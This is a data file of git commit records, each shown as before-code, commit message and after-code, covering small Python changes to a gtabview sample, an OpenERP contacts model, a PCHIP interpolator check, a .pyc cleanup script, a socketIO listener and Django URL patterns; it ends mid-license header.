gtabview.view(df)
|
Make python3 default also for the samples
|
Make python3 default also for the samples
|
Python
|
mit
|
wavexx/gtabview
|
#!/usr/bin/env python
import pandas as pd
import numpy as np
import gtabview
c_arr = [['bar', 'bar', 'baz', 'baz', 'foo', 'foo', 'qux', 'qux'],
['one', 'two', 'one', 'two', 'one', 'two', 'one', 'two']]
columns = pd.MultiIndex.from_tuples(list(zip(*c_arr)), names=['V1', 'V2'])
i_arr = [['bar', 'bar', 'bar', 'bar', 'baz', 'baz', 'baz', 'baz'],
['foo', 'foo', 'qux', 'qux', 'foo', 'foo', 'qux', 'qux'],
['one', 'two', 'one', 'two', 'one', 'two', 'one', 'two']]
index = pd.MultiIndex.from_tuples(list(zip(*i_arr)), names=['H1', 'H2', 'H3'])
df = pd.DataFrame(np.random.randn(8, 8), columns=columns, index=index)
gtabview.view(df)
Make python3 default also for the samples
|
#!/usr/bin/env python3
import pandas as pd
import numpy as np
import gtabview
c_arr = [['bar', 'bar', 'baz', 'baz', 'foo', 'foo', 'qux', 'qux'],
['one', 'two', 'one', 'two', 'one', 'two', 'one', 'two']]
columns = pd.MultiIndex.from_tuples(list(zip(*c_arr)), names=['V1', 'V2'])
i_arr = [['bar', 'bar', 'bar', 'bar', 'baz', 'baz', 'baz', 'baz'],
['foo', 'foo', 'qux', 'qux', 'foo', 'foo', 'qux', 'qux'],
['one', 'two', 'one', 'two', 'one', 'two', 'one', 'two']]
index = pd.MultiIndex.from_tuples(list(zip(*i_arr)), names=['H1', 'H2', 'H3'])
df = pd.DataFrame(np.random.randn(8, 8), columns=columns, index=index)
gtabview.view(df)
|
<commit_before>#!/usr/bin/env python
import pandas as pd
import numpy as np
import gtabview
c_arr = [['bar', 'bar', 'baz', 'baz', 'foo', 'foo', 'qux', 'qux'],
['one', 'two', 'one', 'two', 'one', 'two', 'one', 'two']]
columns = pd.MultiIndex.from_tuples(list(zip(*c_arr)), names=['V1', 'V2'])
i_arr = [['bar', 'bar', 'bar', 'bar', 'baz', 'baz', 'baz', 'baz'],
['foo', 'foo', 'qux', 'qux', 'foo', 'foo', 'qux', 'qux'],
['one', 'two', 'one', 'two', 'one', 'two', 'one', 'two']]
index = pd.MultiIndex.from_tuples(list(zip(*i_arr)), names=['H1', 'H2', 'H3'])
df = pd.DataFrame(np.random.randn(8, 8), columns=columns, index=index)
gtabview.view(df)
<commit_msg>Make python3 default also for the samples<commit_after>
|
#!/usr/bin/env python3
import pandas as pd
import numpy as np
import gtabview
c_arr = [['bar', 'bar', 'baz', 'baz', 'foo', 'foo', 'qux', 'qux'],
['one', 'two', 'one', 'two', 'one', 'two', 'one', 'two']]
columns = pd.MultiIndex.from_tuples(list(zip(*c_arr)), names=['V1', 'V2'])
i_arr = [['bar', 'bar', 'bar', 'bar', 'baz', 'baz', 'baz', 'baz'],
['foo', 'foo', 'qux', 'qux', 'foo', 'foo', 'qux', 'qux'],
['one', 'two', 'one', 'two', 'one', 'two', 'one', 'two']]
index = pd.MultiIndex.from_tuples(list(zip(*i_arr)), names=['H1', 'H2', 'H3'])
df = pd.DataFrame(np.random.randn(8, 8), columns=columns, index=index)
gtabview.view(df)
|
#!/usr/bin/env python
import pandas as pd
import numpy as np
import gtabview
c_arr = [['bar', 'bar', 'baz', 'baz', 'foo', 'foo', 'qux', 'qux'],
['one', 'two', 'one', 'two', 'one', 'two', 'one', 'two']]
columns = pd.MultiIndex.from_tuples(list(zip(*c_arr)), names=['V1', 'V2'])
i_arr = [['bar', 'bar', 'bar', 'bar', 'baz', 'baz', 'baz', 'baz'],
['foo', 'foo', 'qux', 'qux', 'foo', 'foo', 'qux', 'qux'],
['one', 'two', 'one', 'two', 'one', 'two', 'one', 'two']]
index = pd.MultiIndex.from_tuples(list(zip(*i_arr)), names=['H1', 'H2', 'H3'])
df = pd.DataFrame(np.random.randn(8, 8), columns=columns, index=index)
gtabview.view(df)
Make python3 default also for the samples#!/usr/bin/env python3
import pandas as pd
import numpy as np
import gtabview
c_arr = [['bar', 'bar', 'baz', 'baz', 'foo', 'foo', 'qux', 'qux'],
['one', 'two', 'one', 'two', 'one', 'two', 'one', 'two']]
columns = pd.MultiIndex.from_tuples(list(zip(*c_arr)), names=['V1', 'V2'])
i_arr = [['bar', 'bar', 'bar', 'bar', 'baz', 'baz', 'baz', 'baz'],
['foo', 'foo', 'qux', 'qux', 'foo', 'foo', 'qux', 'qux'],
['one', 'two', 'one', 'two', 'one', 'two', 'one', 'two']]
index = pd.MultiIndex.from_tuples(list(zip(*i_arr)), names=['H1', 'H2', 'H3'])
df = pd.DataFrame(np.random.randn(8, 8), columns=columns, index=index)
gtabview.view(df)
|
<commit_before>#!/usr/bin/env python
import pandas as pd
import numpy as np
import gtabview
c_arr = [['bar', 'bar', 'baz', 'baz', 'foo', 'foo', 'qux', 'qux'],
['one', 'two', 'one', 'two', 'one', 'two', 'one', 'two']]
columns = pd.MultiIndex.from_tuples(list(zip(*c_arr)), names=['V1', 'V2'])
i_arr = [['bar', 'bar', 'bar', 'bar', 'baz', 'baz', 'baz', 'baz'],
['foo', 'foo', 'qux', 'qux', 'foo', 'foo', 'qux', 'qux'],
['one', 'two', 'one', 'two', 'one', 'two', 'one', 'two']]
index = pd.MultiIndex.from_tuples(list(zip(*i_arr)), names=['H1', 'H2', 'H3'])
df = pd.DataFrame(np.random.randn(8, 8), columns=columns, index=index)
gtabview.view(df)
<commit_msg>Make python3 default also for the samples<commit_after>#!/usr/bin/env python3
import pandas as pd
import numpy as np
import gtabview
c_arr = [['bar', 'bar', 'baz', 'baz', 'foo', 'foo', 'qux', 'qux'],
['one', 'two', 'one', 'two', 'one', 'two', 'one', 'two']]
columns = pd.MultiIndex.from_tuples(list(zip(*c_arr)), names=['V1', 'V2'])
i_arr = [['bar', 'bar', 'bar', 'bar', 'baz', 'baz', 'baz', 'baz'],
['foo', 'foo', 'qux', 'qux', 'foo', 'foo', 'qux', 'qux'],
['one', 'two', 'one', 'two', 'one', 'two', 'one', 'two']]
index = pd.MultiIndex.from_tuples(list(zip(*i_arr)), names=['H1', 'H2', 'H3'])
df = pd.DataFrame(np.random.randn(8, 8), columns=columns, index=index)
gtabview.view(df)
|
c21318fa5c125e54160f67d410cf4572a2f9a47e
|
addons/web_calendar/contacts.py
|
addons/web_calendar/contacts.py
|
from openerp.osv import fields, osv
class web_calendar_contacts(osv.osv):
_name = 'web_calendar.contacts'
_columns = {
'user_id': fields.many2one('res.users','Me'),
'partner_id': fields.many2one('res.partner','Contact'),
'active':fields.boolean('active'),
}
_defaults = {
'user_id': lambda self, cr, uid, ctx: uid,
'active' : True,
}
|
from openerp.osv import fields, osv
class web_calendar_contacts(osv.osv):
_name = 'web_calendar.contacts'
_columns = {
'user_id': fields.many2one('res.users','Me'),
'partner_id': fields.many2one('res.partner','Contact',required=True),
'active':fields.boolean('active'),
}
_defaults = {
'user_id': lambda self, cr, uid, ctx: uid,
'active' : True,
}
|
Add required on field res.partner from model Contacts to avoid the creation of empty coworkers
|
[FIX] Add required on field res.partner from model Contacts to avoid the creation of empty coworkers
|
Python
|
agpl-3.0
|
havt/openerp-web,havt/openerp-web,havt/openerp-web,havt/openerp-web,havt/openerp-web
|
from openerp.osv import fields, osv
class web_calendar_contacts(osv.osv):
_name = 'web_calendar.contacts'
_columns = {
'user_id': fields.many2one('res.users','Me'),
'partner_id': fields.many2one('res.partner','Contact'),
'active':fields.boolean('active'),
}
_defaults = {
'user_id': lambda self, cr, uid, ctx: uid,
'active' : True,
}[FIX] Add required on field res.partner from model Contacts to avoid the creation of empty coworkers
|
from openerp.osv import fields, osv
class web_calendar_contacts(osv.osv):
_name = 'web_calendar.contacts'
_columns = {
'user_id': fields.many2one('res.users','Me'),
'partner_id': fields.many2one('res.partner','Contact',required=True),
'active':fields.boolean('active'),
}
_defaults = {
'user_id': lambda self, cr, uid, ctx: uid,
'active' : True,
}
|
<commit_before>from openerp.osv import fields, osv
class web_calendar_contacts(osv.osv):
_name = 'web_calendar.contacts'
_columns = {
'user_id': fields.many2one('res.users','Me'),
'partner_id': fields.many2one('res.partner','Contact'),
'active':fields.boolean('active'),
}
_defaults = {
'user_id': lambda self, cr, uid, ctx: uid,
'active' : True,
}<commit_msg>[FIX] Add required on field res.partner from model Contacts to avoid the creation of empty coworkers<commit_after>
|
from openerp.osv import fields, osv
class web_calendar_contacts(osv.osv):
_name = 'web_calendar.contacts'
_columns = {
'user_id': fields.many2one('res.users','Me'),
'partner_id': fields.many2one('res.partner','Contact',required=True),
'active':fields.boolean('active'),
}
_defaults = {
'user_id': lambda self, cr, uid, ctx: uid,
'active' : True,
}
|
from openerp.osv import fields, osv
class web_calendar_contacts(osv.osv):
_name = 'web_calendar.contacts'
_columns = {
'user_id': fields.many2one('res.users','Me'),
'partner_id': fields.many2one('res.partner','Contact'),
'active':fields.boolean('active'),
}
_defaults = {
'user_id': lambda self, cr, uid, ctx: uid,
'active' : True,
}[FIX] Add required on field res.partner from model Contacts to avoid the creation of empty coworkersfrom openerp.osv import fields, osv
class web_calendar_contacts(osv.osv):
_name = 'web_calendar.contacts'
_columns = {
'user_id': fields.many2one('res.users','Me'),
'partner_id': fields.many2one('res.partner','Contact',required=True),
'active':fields.boolean('active'),
}
_defaults = {
'user_id': lambda self, cr, uid, ctx: uid,
'active' : True,
}
|
<commit_before>from openerp.osv import fields, osv
class web_calendar_contacts(osv.osv):
_name = 'web_calendar.contacts'
_columns = {
'user_id': fields.many2one('res.users','Me'),
'partner_id': fields.many2one('res.partner','Contact'),
'active':fields.boolean('active'),
}
_defaults = {
'user_id': lambda self, cr, uid, ctx: uid,
'active' : True,
}<commit_msg>[FIX] Add required on field res.partner from model Contacts to avoid the creation of empty coworkers<commit_after>from openerp.osv import fields, osv
class web_calendar_contacts(osv.osv):
_name = 'web_calendar.contacts'
_columns = {
'user_id': fields.many2one('res.users','Me'),
'partner_id': fields.many2one('res.partner','Contact',required=True),
'active':fields.boolean('active'),
}
_defaults = {
'user_id': lambda self, cr, uid, ctx: uid,
'active' : True,
}
|
31986c4c7d5781f0924289308d99754c81d29710
|
pml/units.py
|
pml/units.py
|
import numpy as np
from scipy.interpolate import PchipInterpolator
class UcPoly(object):
def __init__(self, coef):
self.p = np.poly1d(coef)
def machine_to_physics(self, machine_value):
return self.p(machine_value)
def physics_to_machine(self, physics_value):
roots = (self.p - physics_value).roots
positive_roots = [root for root in roots if root > 0]
if len(positive_roots) > 0:
return positive_roots[0]
else:
raise ValueError("No corresponding positive machine value:", roots)
class UcPchip(object):
def __init__(self, x, y):
self.x = x
self.y = y
self.pp = PchipInterpolator(x, y)
def machine_to_physics(self, machine_value):
return self.pp(machine_value)
def physics_to_machine(self, physics_value):
y = [val - physics_value for val in self.y]
new_pp = PchipInterpolator(self.x, y)
return new_pp.roots()[0]
|
import numpy as np
from scipy.interpolate import PchipInterpolator
class UcPoly(object):
def __init__(self, coef):
self.p = np.poly1d(coef)
def machine_to_physics(self, machine_value):
return self.p(machine_value)
def physics_to_machine(self, physics_value):
roots = (self.p - physics_value).roots
positive_roots = [root for root in roots if root > 0]
if len(positive_roots) > 0:
return positive_roots[0]
else:
raise ValueError("No corresponding positive machine value:", roots)
class UcPchip(object):
def __init__(self, x, y):
self.x = x
self.y = y
self.pp = PchipInterpolator(x, y)
diff = np.diff(y)
if not (np.all(diff > 0)):
raise ValueError('''Given coefficients must be
monotonically increasing.''')
def machine_to_physics(self, machine_value):
return self.pp(machine_value)
def physics_to_machine(self, physics_value):
y = [val - physics_value for val in self.y]
new_pp = PchipInterpolator(self.x, y)
return new_pp.roots()[0]
|
Raise error when creating PChip object with non-monotonically increasing y list
|
Raise error when creating PChip object with non-monotonically increasing y list
|
Python
|
apache-2.0
|
willrogers/pml,willrogers/pml
|
import numpy as np
from scipy.interpolate import PchipInterpolator
class UcPoly(object):
def __init__(self, coef):
self.p = np.poly1d(coef)
def machine_to_physics(self, machine_value):
return self.p(machine_value)
def physics_to_machine(self, physics_value):
roots = (self.p - physics_value).roots
positive_roots = [root for root in roots if root > 0]
if len(positive_roots) > 0:
return positive_roots[0]
else:
raise ValueError("No corresponding positive machine value:", roots)
class UcPchip(object):
def __init__(self, x, y):
self.x = x
self.y = y
self.pp = PchipInterpolator(x, y)
def machine_to_physics(self, machine_value):
return self.pp(machine_value)
def physics_to_machine(self, physics_value):
y = [val - physics_value for val in self.y]
new_pp = PchipInterpolator(self.x, y)
return new_pp.roots()[0]
Raise error when creating PChip object with non-monotonically increasing y list
|
import numpy as np
from scipy.interpolate import PchipInterpolator
class UcPoly(object):
def __init__(self, coef):
self.p = np.poly1d(coef)
def machine_to_physics(self, machine_value):
return self.p(machine_value)
def physics_to_machine(self, physics_value):
roots = (self.p - physics_value).roots
positive_roots = [root for root in roots if root > 0]
if len(positive_roots) > 0:
return positive_roots[0]
else:
raise ValueError("No corresponding positive machine value:", roots)
class UcPchip(object):
def __init__(self, x, y):
self.x = x
self.y = y
self.pp = PchipInterpolator(x, y)
diff = np.diff(y)
if not (np.all(diff > 0)):
raise ValueError('''Given coefficients must be
monotonically increasing.''')
def machine_to_physics(self, machine_value):
return self.pp(machine_value)
def physics_to_machine(self, physics_value):
y = [val - physics_value for val in self.y]
new_pp = PchipInterpolator(self.x, y)
return new_pp.roots()[0]
|
<commit_before>import numpy as np
from scipy.interpolate import PchipInterpolator
class UcPoly(object):
def __init__(self, coef):
self.p = np.poly1d(coef)
def machine_to_physics(self, machine_value):
return self.p(machine_value)
def physics_to_machine(self, physics_value):
roots = (self.p - physics_value).roots
positive_roots = [root for root in roots if root > 0]
if len(positive_roots) > 0:
return positive_roots[0]
else:
raise ValueError("No corresponding positive machine value:", roots)
class UcPchip(object):
def __init__(self, x, y):
self.x = x
self.y = y
self.pp = PchipInterpolator(x, y)
def machine_to_physics(self, machine_value):
return self.pp(machine_value)
def physics_to_machine(self, physics_value):
y = [val - physics_value for val in self.y]
new_pp = PchipInterpolator(self.x, y)
return new_pp.roots()[0]
<commit_msg>Raise error when creating PChip object with non-monotonically increasing y list<commit_after>
|
import numpy as np
from scipy.interpolate import PchipInterpolator
class UcPoly(object):
def __init__(self, coef):
self.p = np.poly1d(coef)
def machine_to_physics(self, machine_value):
return self.p(machine_value)
def physics_to_machine(self, physics_value):
roots = (self.p - physics_value).roots
positive_roots = [root for root in roots if root > 0]
if len(positive_roots) > 0:
return positive_roots[0]
else:
raise ValueError("No corresponding positive machine value:", roots)
class UcPchip(object):
def __init__(self, x, y):
self.x = x
self.y = y
self.pp = PchipInterpolator(x, y)
diff = np.diff(y)
if not (np.all(diff > 0)):
raise ValueError('''Given coefficients must be
monotonically increasing.''')
def machine_to_physics(self, machine_value):
return self.pp(machine_value)
def physics_to_machine(self, physics_value):
y = [val - physics_value for val in self.y]
new_pp = PchipInterpolator(self.x, y)
return new_pp.roots()[0]
|
import numpy as np
from scipy.interpolate import PchipInterpolator
class UcPoly(object):
def __init__(self, coef):
self.p = np.poly1d(coef)
def machine_to_physics(self, machine_value):
return self.p(machine_value)
def physics_to_machine(self, physics_value):
roots = (self.p - physics_value).roots
positive_roots = [root for root in roots if root > 0]
if len(positive_roots) > 0:
return positive_roots[0]
else:
raise ValueError("No corresponding positive machine value:", roots)
class UcPchip(object):
def __init__(self, x, y):
self.x = x
self.y = y
self.pp = PchipInterpolator(x, y)
def machine_to_physics(self, machine_value):
return self.pp(machine_value)
def physics_to_machine(self, physics_value):
y = [val - physics_value for val in self.y]
new_pp = PchipInterpolator(self.x, y)
return new_pp.roots()[0]
Raise error when creating PChip object with non-monotonically increasing y listimport numpy as np
from scipy.interpolate import PchipInterpolator
class UcPoly(object):
def __init__(self, coef):
self.p = np.poly1d(coef)
def machine_to_physics(self, machine_value):
return self.p(machine_value)
def physics_to_machine(self, physics_value):
roots = (self.p - physics_value).roots
positive_roots = [root for root in roots if root > 0]
if len(positive_roots) > 0:
return positive_roots[0]
else:
raise ValueError("No corresponding positive machine value:", roots)
class UcPchip(object):
def __init__(self, x, y):
self.x = x
self.y = y
self.pp = PchipInterpolator(x, y)
diff = np.diff(y)
if not (np.all(diff > 0)):
raise ValueError('''Given coefficients must be
monotonically increasing.''')
def machine_to_physics(self, machine_value):
return self.pp(machine_value)
def physics_to_machine(self, physics_value):
y = [val - physics_value for val in self.y]
new_pp = PchipInterpolator(self.x, y)
return new_pp.roots()[0]
|
<commit_before>import numpy as np
from scipy.interpolate import PchipInterpolator
class UcPoly(object):
def __init__(self, coef):
self.p = np.poly1d(coef)
def machine_to_physics(self, machine_value):
return self.p(machine_value)
def physics_to_machine(self, physics_value):
roots = (self.p - physics_value).roots
positive_roots = [root for root in roots if root > 0]
if len(positive_roots) > 0:
return positive_roots[0]
else:
raise ValueError("No corresponding positive machine value:", roots)
class UcPchip(object):
def __init__(self, x, y):
self.x = x
self.y = y
self.pp = PchipInterpolator(x, y)
def machine_to_physics(self, machine_value):
return self.pp(machine_value)
def physics_to_machine(self, physics_value):
y = [val - physics_value for val in self.y]
new_pp = PchipInterpolator(self.x, y)
return new_pp.roots()[0]
<commit_msg>Raise error when creating PChip object with non-monotonically increasing y list<commit_after>import numpy as np
from scipy.interpolate import PchipInterpolator
class UcPoly(object):
def __init__(self, coef):
self.p = np.poly1d(coef)
def machine_to_physics(self, machine_value):
return self.p(machine_value)
def physics_to_machine(self, physics_value):
roots = (self.p - physics_value).roots
positive_roots = [root for root in roots if root > 0]
if len(positive_roots) > 0:
return positive_roots[0]
else:
raise ValueError("No corresponding positive machine value:", roots)
class UcPchip(object):
def __init__(self, x, y):
self.x = x
self.y = y
self.pp = PchipInterpolator(x, y)
diff = np.diff(y)
if not (np.all(diff > 0)):
raise ValueError('''Given coefficients must be
monotonically increasing.''')
def machine_to_physics(self, machine_value):
return self.pp(machine_value)
def physics_to_machine(self, physics_value):
y = [val - physics_value for val in self.y]
new_pp = PchipInterpolator(self.x, y)
return new_pp.roots()[0]
|
95d2036aab2e3d154f4f292ef8624d6d02d48ac0
|
cleanpyc.py
|
cleanpyc.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'xilei'
import os
from os.path import join
import stat
def chmod(targetdir):
"""
remove *.pyc files
"""
for root, dirs, files in os.walk(targetdir):
for file in files:
prefix,ext = os.path.splitext(file)
if ext == '.pyc':
filename = join(root,file)
os.remove(filename)
print("remove:%s" % filename)
if __name__ == '__main__':
chmod('./')
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'xilei'
import os
from os.path import join
import stat
def rmpyc(targetdir):
"""
remove *.pyc files
"""
for root, dirs, files in os.walk(targetdir):
for file in files:
prefix,ext = os.path.splitext(file)
if ext == '.pyc':
filename = join(root,file)
os.remove(filename)
print("remove:%s" % filename)
if __name__ == '__main__':
rmpyc('./')
|
Change function name chmod to rmpyc
|
Change function name chmod to rmpyc
|
Python
|
apache-2.0
|
xiilei/pytools,xiilei/pytools
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'xilei'
import os
from os.path import join
import stat
def chmod(targetdir):
"""
remove *.pyc files
"""
for root, dirs, files in os.walk(targetdir):
for file in files:
prefix,ext = os.path.splitext(file)
if ext == '.pyc':
filename = join(root,file)
os.remove(filename)
print("remove:%s" % filename)
if __name__ == '__main__':
chmod('./')
Change function name chmod to rmpyc
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'xilei'
import os
from os.path import join
import stat
def rmpyc(targetdir):
"""
remove *.pyc files
"""
for root, dirs, files in os.walk(targetdir):
for file in files:
prefix,ext = os.path.splitext(file)
if ext == '.pyc':
filename = join(root,file)
os.remove(filename)
print("remove:%s" % filename)
if __name__ == '__main__':
rmpyc('./')
|
<commit_before>#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'xilei'
import os
from os.path import join
import stat
def chmod(targetdir):
"""
remove *.pyc files
"""
for root, dirs, files in os.walk(targetdir):
for file in files:
prefix,ext = os.path.splitext(file)
if ext == '.pyc':
filename = join(root,file)
os.remove(filename)
print("remove:%s" % filename)
if __name__ == '__main__':
chmod('./')
<commit_msg>Change function name chmod to rmpyc<commit_after>
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'xilei'
import os
from os.path import join
import stat
def rmpyc(targetdir):
"""
remove *.pyc files
"""
for root, dirs, files in os.walk(targetdir):
for file in files:
prefix,ext = os.path.splitext(file)
if ext == '.pyc':
filename = join(root,file)
os.remove(filename)
print("remove:%s" % filename)
if __name__ == '__main__':
rmpyc('./')
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'xilei'
import os
from os.path import join
import stat
def chmod(targetdir):
"""
remove *.pyc files
"""
for root, dirs, files in os.walk(targetdir):
for file in files:
prefix,ext = os.path.splitext(file)
if ext == '.pyc':
filename = join(root,file)
os.remove(filename)
print("remove:%s" % filename)
if __name__ == '__main__':
chmod('./')
Change function name chmod to rmpyc#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'xilei'
import os
from os.path import join
import stat
def rmpyc(targetdir):
"""
remove *.pyc files
"""
for root, dirs, files in os.walk(targetdir):
for file in files:
prefix,ext = os.path.splitext(file)
if ext == '.pyc':
filename = join(root,file)
os.remove(filename)
print("remove:%s" % filename)
if __name__ == '__main__':
rmpyc('./')
|
<commit_before>#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'xilei'
import os
from os.path import join
import stat
def chmod(targetdir):
"""
remove *.pyc files
"""
for root, dirs, files in os.walk(targetdir):
for file in files:
prefix,ext = os.path.splitext(file)
if ext == '.pyc':
filename = join(root,file)
os.remove(filename)
print("remove:%s" % filename)
if __name__ == '__main__':
chmod('./')
<commit_msg>Change function name chmod to rmpyc<commit_after>#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'xilei'
import os
from os.path import join
import stat
def rmpyc(targetdir):
"""
remove *.pyc files
"""
for root, dirs, files in os.walk(targetdir):
for file in files:
prefix,ext = os.path.splitext(file)
if ext == '.pyc':
filename = join(root,file)
os.remove(filename)
print("remove:%s" % filename)
if __name__ == '__main__':
rmpyc('./')
|
92d7058347da755ff90621c56b36959521dfc99a
|
scripts/commandsocket.py
|
scripts/commandsocket.py
|
import RPi.GPIO as GPIO
import time
from socketIO_client import SocketIO, LoggingNamespace
socketIO = SocketIO('localhost:3000')
def onCommand(*args):
print("hello")
while (True):
socketIO.on("commands", onCommand)
socketIO.wait(seconds=1)
socketIO.off("sequencePi")
|
import RPi.GPIO as GPIO
import time
from socketIO_client import SocketIO, LoggingNamespace
socketIO = SocketIO('localhost:3000')
def onCommand(*args):
print(args)
while (True):
socketIO.on("commands", onCommand)
socketIO.wait(seconds=1)
socketIO.off("sequencePi")
|
Make sockets print actual output
|
Make sockets print actual output
Make sockets print actual output
|
Python
|
mit
|
willdavidc/piel,willdavidc/piel,willdavidc/piel,willdavidc/piel,willdavidc/piel
|
import RPi.GPIO as GPIO
import time
from socketIO_client import SocketIO, LoggingNamespace
socketIO = SocketIO('localhost:3000')
def onCommand(*args):
print("hello")
while (True):
socketIO.on("commands", onCommand)
socketIO.wait(seconds=1)
socketIO.off("sequencePi")Make sockets print actual output
Make sockets print actual output
|
import RPi.GPIO as GPIO
import time
from socketIO_client import SocketIO, LoggingNamespace
socketIO = SocketIO('localhost:3000')
def onCommand(*args):
print(args)
while (True):
socketIO.on("commands", onCommand)
socketIO.wait(seconds=1)
socketIO.off("sequencePi")
|
<commit_before>import RPi.GPIO as GPIO
import time
from socketIO_client import SocketIO, LoggingNamespace
socketIO = SocketIO('localhost:3000')
def onCommand(*args):
print("hello")
while (True):
socketIO.on("commands", onCommand)
socketIO.wait(seconds=1)
socketIO.off("sequencePi")<commit_msg>Make sockets print actual output
Make sockets print actual output<commit_after>
|
import RPi.GPIO as GPIO
import time
from socketIO_client import SocketIO, LoggingNamespace
socketIO = SocketIO('localhost:3000')
def onCommand(*args):
print(args)
while (True):
socketIO.on("commands", onCommand)
socketIO.wait(seconds=1)
socketIO.off("sequencePi")
|
import RPi.GPIO as GPIO
import time
from socketIO_client import SocketIO, LoggingNamespace
socketIO = SocketIO('localhost:3000')
def onCommand(*args):
print("hello")
while (True):
socketIO.on("commands", onCommand)
socketIO.wait(seconds=1)
socketIO.off("sequencePi")Make sockets print actual output
Make sockets print actual outputimport RPi.GPIO as GPIO
import time
from socketIO_client import SocketIO, LoggingNamespace
socketIO = SocketIO('localhost:3000')
def onCommand(*args):
print(args)
while (True):
socketIO.on("commands", onCommand)
socketIO.wait(seconds=1)
socketIO.off("sequencePi")
|
<commit_before>import RPi.GPIO as GPIO
import time
from socketIO_client import SocketIO, LoggingNamespace
socketIO = SocketIO('localhost:3000')
def onCommand(*args):
print("hello")
while (True):
socketIO.on("commands", onCommand)
socketIO.wait(seconds=1)
socketIO.off("sequencePi")<commit_msg>Make sockets print actual output
Make sockets print actual output<commit_after>import RPi.GPIO as GPIO
import time
from socketIO_client import SocketIO, LoggingNamespace
socketIO = SocketIO('localhost:3000')
def onCommand(*args):
print(args)
while (True):
socketIO.on("commands", onCommand)
socketIO.wait(seconds=1)
socketIO.off("sequencePi")
|
3a44dbeec871aa057c4d5b42c9089a8d2b649063
|
django_agpl/urls.py
|
django_agpl/urls.py
|
# -*- coding: utf-8 -*-
#
# django-agpl -- tools to aid releasing Django projects under the AGPL
# Copyright (C) 2008, 2009, 2016 Chris Lamb <chris@chris-lamb.co.uk>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.conf.urls import patterns, url
from . import views
urlpatterns = patterns('django_agpl.views',
url(r'^tar$', views.tar,
name='download-tar'),
url(r'^zip$', views.zip,
name='download-zip'),
url(r'^targz$', views.targz,
name='download-targz'),
url(r'^tarbz2$', views.tarbz2,
name='download-tarbz2'),
)
|
# -*- coding: utf-8 -*-
#
# django-agpl -- tools to aid releasing Django projects under the AGPL
# Copyright (C) 2008, 2009, 2016 Chris Lamb <chris@chris-lamb.co.uk>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.conf.urls import url
from . import views
urlpatterns = (
url(r'^tar$', views.tar,
name='download-tar'),
url(r'^zip$', views.zip,
name='download-zip'),
url(r'^targz$', views.targz,
name='download-targz'),
url(r'^tarbz2$', views.tarbz2,
name='download-tarbz2'),
)
|
Drop patterns import for Django 1.10 compatibility.
|
Drop patterns import for Django 1.10 compatibility.
|
Python
|
agpl-3.0
|
lamby/django-agpl,lamby/django-agpl
|
# -*- coding: utf-8 -*-
#
# django-agpl -- tools to aid releasing Django projects under the AGPL
# Copyright (C) 2008, 2009, 2016 Chris Lamb <chris@chris-lamb.co.uk>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.conf.urls import patterns, url
from . import views
urlpatterns = patterns('django_agpl.views',
url(r'^tar$', views.tar,
name='download-tar'),
url(r'^zip$', views.zip,
name='download-zip'),
url(r'^targz$', views.targz,
name='download-targz'),
url(r'^tarbz2$', views.tarbz2,
name='download-tarbz2'),
)
Drop patterns import for Django 1.10 compatibility.
|
# -*- coding: utf-8 -*-
#
# django-agpl -- tools to aid releasing Django projects under the AGPL
# Copyright (C) 2008, 2009, 2016 Chris Lamb <chris@chris-lamb.co.uk>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.conf.urls import url
from . import views
urlpatterns = (
url(r'^tar$', views.tar,
name='download-tar'),
url(r'^zip$', views.zip,
name='download-zip'),
url(r'^targz$', views.targz,
name='download-targz'),
url(r'^tarbz2$', views.tarbz2,
name='download-tarbz2'),
)
|
<commit_before># -*- coding: utf-8 -*-
#
# django-agpl -- tools to aid releasing Django projects under the AGPL
# Copyright (C) 2008, 2009, 2016 Chris Lamb <chris@chris-lamb.co.uk>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
